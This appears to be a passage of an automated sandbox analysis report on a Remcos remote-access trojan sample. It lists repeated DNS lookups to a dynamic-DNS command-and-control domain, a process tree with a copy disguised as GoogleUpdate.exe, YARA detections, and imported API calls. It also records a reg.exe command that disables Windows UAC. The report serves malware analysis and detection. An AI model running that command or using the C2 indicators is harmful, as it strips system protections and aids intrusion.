Jan 11, 2025 20:09:33.633035898 CET	192.168.2.4	1.1.1.1	0x82e2	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:09:38.288865089 CET	192.168.2.4	1.1.1.1	0x856d	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:09:43.364773035 CET	192.168.2.4	1.1.1.1	0x3709	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:09:48.523138046 CET	192.168.2.4	1.1.1.1	0xc578	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:09:53.288700104 CET	192.168.2.4	1.1.1.1	0x9944	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:09:59.339991093 CET	192.168.2.4	1.1.1.1	0x7cca	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:10:04.288410902 CET	192.168.2.4	1.1.1.1	0xb773	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:10:09.290155888 CET	192.168.2.4	1.1.1.1	0x4525	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:10:14.695435047 CET	192.168.2.4	1.1.1.1	0x806e	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:10:20.132447004 CET	192.168.2.4	1.1.1.1	0x9a02	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:10:24.840306997 CET	192.168.2.4	1.1.1.1	0x1ef5	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:10:29.293070078 CET	192.168.2.4	1.1.1.1	0xcdbc	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:10:34.289505959 CET	192.168.2.4	1.1.1.1	0xa7cc	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:10:39.335654974 CET	192.168.2.4	1.1.1.1	0xf625	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:10:44.292953014 CET	192.168.2.4	1.1.1.1	0x898e	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:10:49.288759947 CET	192.168.2.4	1.1.1.1	0x2452	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:10:54.523364067 CET	192.168.2.4	1.1.1.1	0x8374	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:10:59.429378033 CET	192.168.2.4	1.1.1.1	0xc997	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:11:05.226679087 CET	192.168.2.4	1.1.1.1	0xdcdf	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	14:06:56
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\DB5rQYsfd6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DB5rQYsfd6.exe"
Imagebase:	0x400000
File size:	480'256 bytes
MD5 hash:	991E707E324731F86A43900E34070808
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000000.1664470390.0000000000456000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000000.1664470390.0000000000456000.00000002.00000001.01000000.00000003.sdmp, Author: unknown Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000003.1665273424.000000000054C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:06:56
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	14:06:56
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	14:06:56
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Imagebase:	0xa20000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:06:56
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
Imagebase:	0xb40000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:06:58
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	14:06:58
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	14:06:58
Start date:	11/01/2025
Path:	C:\ProgramData\GoogleDat\GoogleUpdate.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\GoogleDat\GoogleUpdate.exe
Imagebase:	0x400000
File size:	480'256 bytes
MD5 hash:	991E707E324731F86A43900E34070808
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000000.1689947215.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000000.1689947215.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 89%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	14:06:58
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Analysis Process: conhost.exePID: 7920, Parent PID: 7904

General

Target ID:	12
Start time:	14:06:58
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	14:06:58
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	svchost.exe
Imagebase:	0x1d0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.4123857872.0000000003230000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.4123857872.0000000003230000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	14:06:58
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Imagebase:	0xa20000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:07:05
Start date:	11/01/2025
Path:	C:\ProgramData\GoogleDat\GoogleUpdate.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\GoogleDat\GoogleUpdate.exe"
Imagebase:	0x400000
File size:	480'256 bytes
MD5 hash:	991E707E324731F86A43900E34070808
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.1756643993.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.1756643993.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000000.1756098739.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000000.1756098739.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	14:07:05
Start date:	11/01/2025
Path:	C:\ProgramData\GoogleDat\GoogleUpdate.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\GoogleDat\GoogleUpdate.exe"
Imagebase:	0x400000
File size:	480'256 bytes
MD5 hash:	991E707E324731F86A43900E34070808
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000000.1762040408.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000012.00000000.1762040408.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.1762879487.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000012.00000002.1762879487.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	14:07:13
Start date:	11/01/2025
Path:	C:\ProgramData\GoogleDat\GoogleUpdate.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\GoogleDat\GoogleUpdate.exe"
Imagebase:	0x400000
File size:	480'256 bytes
MD5 hash:	991E707E324731F86A43900E34070808
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000000.1836764394.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000000.1836764394.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.1837263021.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.1837263021.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	14:07:13
Start date:	11/01/2025
Path:	C:\ProgramData\GoogleDat\GoogleUpdate.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\GoogleDat\GoogleUpdate.exe"
Imagebase:	0x400000
File size:	480'256 bytes
MD5 hash:	991E707E324731F86A43900E34070808
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.1840917255.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000016.00000002.1840917255.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000000.1840006735.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000016.00000000.1840006735.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	14:07:21
Start date:	11/01/2025
Path:	C:\ProgramData\GoogleDat\GoogleUpdate.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\GoogleDat\GoogleUpdate.exe"
Imagebase:	0x400000
File size:	480'256 bytes
MD5 hash:	991E707E324731F86A43900E34070808
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.1917821912.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000019.00000002.1917821912.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000000.1917703042.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000019.00000000.1917703042.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	14:07:21
Start date:	11/01/2025
Path:	C:\ProgramData\GoogleDat\GoogleUpdate.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\GoogleDat\GoogleUpdate.exe"
Imagebase:	0x400000
File size:	480'256 bytes
MD5 hash:	991E707E324731F86A43900E34070808
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000000.1919217572.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001B.00000000.1919217572.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000002.1919786507.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001B.00000002.1919786507.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	25.3%
Total number of Nodes:	766
Total number of Limit Nodes:	18

Executed Functions

Function 0041A8DA Relevance: 105.1, APIs: 36, Strings: 24, Instructions: 130
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
GetProcAddress.KERNEL32(00000000), ref: 0041A912
LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
GetProcAddress.KERNEL32(00000000), ref: 0041A927
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
GetProcAddress.KERNEL32(00000000), ref: 0041A940
GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
GetProcAddress.KERNEL32(00000000), ref: 0041A954
GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
GetProcAddress.KERNEL32(00000000), ref: 0041A96C
LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
GetProcAddress.KERNEL32(00000000), ref: 0041A980
LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
GetProcAddress.KERNEL32(00000000), ref: 0041A98F
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
GetProcAddress.KERNEL32(00000000), ref: 0041AA22
LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
GetProcAddress.KERNEL32(00000000), ref: 0041AA33
LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
GetProcAddress.KERNEL32(00000000), ref: 0041AA43

Strings

Shlwapi.dll, xrefs: 0041AA26
GlobalMemoryStatusEx, xrefs: 0041A982
IsUserAnAdmin, xrefs: 0041A9B6
NtUnmapViewOfSection, xrefs: 0041A973
Shell32, xrefs: 0041A9BB
EnumDisplayDevicesW, xrefs: 0041A9DA
GetMonitorInfoW, xrefs: 0041A9FF
user32, xrefs: 0041A964, 0041A9DF, 0041A9E9, 0041A9F4, 0041AA04
IsWow64Process, xrefs: 0041A991
SetProcessDpiAwareness, xrefs: 0041A947
SetProcessDpiAware, xrefs: 0041A95F
kernel32.dll, xrefs: 0041A987, 0041AA14, 0041AA1E, 0041AA3A
kernel32, xrefs: 0041A996, 0041A9A0, 0041A9AB, 0041A9CF
GetSystemTimes, xrefs: 0041AA0F
GetComputerNameExW, xrefs: 0041A9A6
EnumDisplayMonitors, xrefs: 0041A9EF
shcore, xrefs: 0041A94C
GetConsoleWindow, xrefs: 0041AA35
ntdll.dll, xrefs: 0041A978
GetModuleFileNameExA, xrefs: 0041A8E4, 0041A8E9, 0041A909
Psapi.dll, xrefs: 0041A8EA, 0041A91F
Kernel32.dll, xrefs: 0041A90A, 0041A938
SetProcessDEPPolicy, xrefs: 0041A9CA
GetModuleFileNameExW, xrefs: 0041A919, 0041A91E, 0041A937

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule$LibraryLoad
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
API String ID: 551388010-2474455403
Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E

Function 0040D3F0 Relevance: 60.3, APIs: 16, Strings: 18, Instructions: 774
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
